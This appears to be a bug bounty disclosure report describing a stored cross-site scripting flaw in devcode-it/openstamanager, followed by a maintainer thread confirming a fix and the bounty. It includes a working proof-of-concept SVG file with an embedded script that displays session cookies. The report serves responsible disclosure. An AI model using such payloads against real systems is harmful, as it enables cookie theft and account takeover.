Cross-site Scripting (XSS) - Stored in devcode-it/openstamanager

Valid

Reported on

Jul 2nd 2021


✍️ Description

Stored xss through file upload via anagrafiche

🕵️‍♂️ Proof of Concept

Go to an existing Anagrafiche or create a new one. Upload a .svg file with the following content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

give a name you want ending with .svg (store-xss.svg) for example. alt text when you click on the uploaded image a new window will open which pops up an xss with the cookie in it. alt text

💥 Impact

Possible to steal admin cookies or take over another account via cookie grepping.

💥 Remediation

Sanitize user input.

💥 References

https://owasp.org/www-community/attacks/xss/

https://en.wikipedia.org/wiki/Cross-site_scripting

https://www.acunetix.com/websitesecurity/cross-site-scripting/

https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/

We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 5 months ago
devcode-it/openstamanager maintainer validated this vulnerability 5 months ago
ribersec has been awarded the disclosure bounty
The fix bounty is now up for grabs
devcode-it/openstamanager maintainer confirmed that a fix has been merged on 7ec0bb 5 months ago
The fix bounty has been dropped
devcode-it/openstamanager maintainer
5 months ago

How can we contact you for bounty?

ribersec
5 months ago

Researcher


Huntr.dev platform handles the bounty.

devcode-it/openstamanager maintainer
5 months ago

Ok! Many thanks! :-D